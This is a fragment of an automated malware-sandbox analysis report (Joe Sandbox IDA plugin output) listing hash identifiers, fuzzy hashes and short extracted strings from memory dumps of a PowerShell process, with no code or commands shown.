                                                                              • Opcode Fuzzy Hash: 89276f3a402a55e71a5fdc71d07edbf96687960a2eaecc2695b06b3b9cb692b6
                                                                              • Instruction Fuzzy Hash: 0EF11431B04249DFDB258A6488507BABBE1EFD5311F2480BBDA19CB352DB39CD42C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe$@#Qe$H;{$L4#p$L4#p$L4#p
                                                                              • API String ID: 0-3483239077
                                                                              • Opcode ID: 6db0a451b9f45a2ea34ec54b06bf1f33844d5931415503fea611ef13ea3631a3
                                                                              • Instruction ID: 84116b773a1d2a723f20ce99c40657346e0f73b8c238d7cbeb4c8510c8b414f9
                                                                              • Opcode Fuzzy Hash: 6db0a451b9f45a2ea34ec54b06bf1f33844d5931415503fea611ef13ea3631a3
                                                                              • Instruction Fuzzy Hash: 6F61F6357002489FEF15AE64C840BBE77A2AFC4310F5480A6EA05DB392DB79ED51CBE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: <4Pe$@#Qe$@#Qe$P_Oe
                                                                              • API String ID: 0-1434401802
                                                                              • Opcode ID: fc43fd4ab449cc419748d04095734d9370b81d74dce361543cde99c48fbbdea8
                                                                              • Instruction ID: 9d2fc83043d9da68c39e4e2c9503418d9dba8bd7e7c0fd492d60f8b06e95b3bf
                                                                              • Opcode Fuzzy Hash: fc43fd4ab449cc419748d04095734d9370b81d74dce361543cde99c48fbbdea8
                                                                              • Instruction Fuzzy Hash: 4E5125313083489FEB159A749850A3ABBE6AFC5310F1480BBDA45CF392DE36DC45C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.420049703.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_7f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#Qe$L4#p$L4#p$L4#p
                                                                              • API String ID: 0-863814531
                                                                              • Opcode ID: 789a02a42c8a9eb59b66f4f421543375c244aa0026c33216f16451fbe31e22e8
                                                                              • Instruction ID: c10c1b9a1219f10e160badabaa243df302ecd5f5a44b598f69980c1d08d87d5e
                                                                              • Opcode Fuzzy Hash: 789a02a42c8a9eb59b66f4f421543375c244aa0026c33216f16451fbe31e22e8
                                                                              • Instruction Fuzzy Hash: DF41A33560028CAFDF259E24C544BBE77B6AB81310F5480A5EA149B392DB78ED91CBE1